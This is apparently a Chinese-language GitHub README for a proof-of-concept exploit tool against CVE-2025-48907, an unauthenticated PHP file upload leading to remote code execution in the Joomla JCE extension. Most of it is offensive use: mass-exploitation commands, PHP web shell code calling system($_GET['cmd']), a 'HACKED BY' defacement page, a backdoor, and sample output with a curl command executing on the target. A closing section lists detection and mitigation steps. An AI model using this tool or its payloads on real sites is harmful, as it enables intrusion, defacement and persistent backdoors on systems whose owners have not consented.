## 📋 概述 本仓库包含了一个针对 **CVE-2025-48907** 的 **概念验证 (PoC) 漏洞利用代码**。该漏洞是 Joomla! JCE (Joomla Content Editor) 扩展在 **2.9.99.5** 之前版本中存在的一个严重漏洞。该漏洞允许**未经身份验证的攻击者**通过 JCE 配置文件导入功能上传任意 **PHP 文件**，从而导致**远程代码执行 (RCE)**。 ### ⚠️ 免责声明 ## 🔍 漏洞详情 | 属性 | 值 | |----------|-------| | **CVE ID** | CVE-2025-48907 | | **产品** | Joomla! JCE Extension | | **受影响版本** | < 2.9.99.5 | | **漏洞类型** | 未经身份验证的 PHP 文件上传 → RCE | | **CVSS 评分** | 9.8 (严重) | | **攻击媒介** | 网络 | | **身份验证** | 无需 | | **影响** | 完全控制系统 | ### 工作原理 1. **提取 CSRF Token**：漏洞利用程序首先从目标主页提取 CSRF token。 2. **滥用配置文件导入**：它利用了 JCE 的配置文件导入功能 (`index.php?option=com_jce&task=profiles.import`)。 3. **上传 PHP 文件**：上传一个伪装成配置文件 XML 格式的恶意 PHP 文件。 4. **执行代码**：上传的 PHP 文件会被放置在 `/tmp/` 目录中，可以通过直接访问来执行。 ## 🚀 功能特点 - ✅ **上传任意 PHP 文件**：上传自定义的 PHP shell、后门或篡改网页 (基于 PHP)。 - ✅ **批量处理**：从文件中扫描并利用多个目标。 - ✅ **CSRF Token 自动检测**：自动提取 CSRF token。 - ✅ **详细模式**：输出详细的调试信息。 - ✅ **结果导出**：将成功上传的 URL 保存到文件中。 ## 📦 安装说明 ``` # Clone repository git clone https://github.com/0xgh057r3c0n/CVE-2025-48907.git cd CVE-2025-48907 # 安装 required dependencies pip3 install requests urllib3 ``` ### 环境要求 - Python 3.6 或更高版本 - `requests` 库 - `urllib3` 库 ## 🎯 使用方法 ### 基本语法 ``` python3 CVE-2025-48907.py -u -F ``` ### 示例 #### 上传 PHP Web Shell ``` python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php ``` #### 上传 PHP 篡改页面 ``` python3 CVE-2025-48907.py -u http://target-joomla.com -F deface.php ``` #### 上传 PHP 后门 ``` python3 CVE-2025-48907.py -u http://target-joomla.com -F backdoor.php ``` #### 使用目标文件进行批量利用 ``` python3 CVE-2025-48907.py -f targets.txt -F payload.php ``` #### 显示详细输出并保存结果 ``` python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php -v -o results.txt ``` ### 命令行参数 | 参数 | 是否必需 | 描述 | |----------|----------|-------------| | `-u, --url` | 是* | 单个目标 URL (例如: http://target.com) | | `-f, --file` | 是* | 包含目标 URL 列表的文件 (每行一个) | | `-F, --upload-file` | 是 | 要上传的 PHP 文件 (shell、后门、篡改页面) | | `-v, --verbose` | 否 | 启用详细输出以便调试 | | `-o, --output` | 否 | 将成功上传的 URL 保存到文件 | *\* 必须提供 `-u` 或 `-f` 中的一个* ### 目标文件格式 创建一个 `targets.txt` 文件，每行一个 URL： ``` http://joomla-site1.com https://joomla-site2.com http://192.168.1.100/joomla # Comments 被忽略 https://example-joomla.com ``` ## 🔧 创建 PHP Payload 所有 payload 必须是 **PHP 文件**，因为漏洞利用程序上传的是将在服务器上执行的 PHP 代码。 ### PHP Web Shell 创建 `shell.php`： ``` "; system($_GET['cmd']); echo ""; } else { echo "Usage: ?cmd=command"; } ?> ``` ### PHP 篡改页面 创建 `deface.php`： ```

HACKED BY 0xgh057r3c0n

██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗ ███████║███████║██║ █████╔╝ █████╗ ██║ ██║ ██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██║ ██║ ██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██████╔╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═════╝

Security is not a product, it\'s a process.

Server:

Time:

'; ?> ``` ### PHP 后门 (极简版) 创建 `backdoor.php`： ``` ``` ## 📊 输出示例 ``` _____________ _______________ _______________ ________ ________ _____ ______ ________________________ \_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \/ _____/ / | | / __ \/ __ \ _ \______ \ / \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ __ \ ______ / | |_> <\____ / /_\ \ / / \ \____\ / | \ /_____/ / \ \_/ \/ \ |__\ \ /_____/ / ^ / -- \ / /\ \_/ \/ / \______ / \___/ /_______ / \_______ \_____ /\_______ \_____ / \____ |\______ / /____/ \_____ /____/ \/ \/ \/ \/ \/ \/ |__| \/ \/ Joomla! JCE extension < 2.9.99.5 Unauthenticated RCE Author : 0xgh057r3c0n (PHP File Upload) [*] Loaded 3 target(s) [*] Target 1/3 [*] ================================================== [+] Target: http://target-joomla.com [+] Fetching CSRF token... [+] CSRF Token: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6 [+] Uploading PHP file: cve-2026-48907-1234.xml.php [+] Profile imported successfully! [+] Testing uploaded PHP file... ============================================================ [!!!!!] PHP FILE UPLOADED SUCCESSFULLY! [!!!!!] Server IS VULNERABLE to CVE-2025-48907! ============================================================ [+] View your uploaded PHP file: http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php [+] Quick access: curl "http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php?cmd=id" ``` ## 🛡️ 检测与缓解 ### 如何检测 - 检查 `/tmp/` 目录中是否存在可疑的 PHP 文件 - 监控日志中的 JCE 配置文件导入活动 - 查找意外的 `index.php?option=com_jce&task=profiles.import` 请求 - 检查 `/tmp/` 中是否有扩展名为 `.xml.php` 的文件 - 监控 `/tmp/` 目录中异常的 PHP 执行情况 ### 缓解措施 1. **更新 JCE 扩展**： - 升级到 **2.9.99.5** 或更高版本 - 下载地址：[JCE 官方网站](https://www.joomlacontenteditor.net/) 2. **临时变通方案**： - 如果不需要，请禁用 JCE 扩展 - 实施Web 应用防火墙 (WAF) 规则 - 限制 `/tmp/` 目录中的 PHP 执行 - 如果不需要，请禁用 `allow_url_fopen` 3. **系统被入侵后的操作**： - 从 `/tmp/` 中删除上传的 PHP 文件 - 审计系统以查找后门 - 重置所有凭据 (Joomla 管理员、FTP、主机) - 检查系统日志以查找未经授权的访问 - 检查其他被篡改的文件 ## 📝 许可证 本项目基于 **MIT 许可证** 授权 - 有关详细信息，请参阅 [LICENSE](LICENSE) 文件。 [](https://opensource.org/licenses/MIT) ## 📞 联系与支持 - **作者**：[0xgh057r3c0n](https://github.com/0xgh057r3c0n) - **GitHub**：[https://github.com/0xgh057r3c0n/CVE-2025-48907](https://github.com/0xgh057r3c0n/CVE-2025-48907) - **问题**：[报告 Bug](https://github.com/0xgh057r3c0n/CVE-2025-48907/issues) ## 🔗 参考资料 - [NVD - CVE-2025-48907](https://nvd.nist.gov/vuln/detail/CVE-2025-48907) - [JCE 官方网站](https://www.joomlacontenteditor.net/) - [Joomla! 安全中心](https://developer.joomla.org/security-centre.html)

_{由 0xgh057r3c0n 用 ❤️ 构建}

标签：CISA项目, Joomla, Python, Web安全, 无后门, 系统独立性, 编程工具, 蓝队分析, 远程代码执行, 逆向工具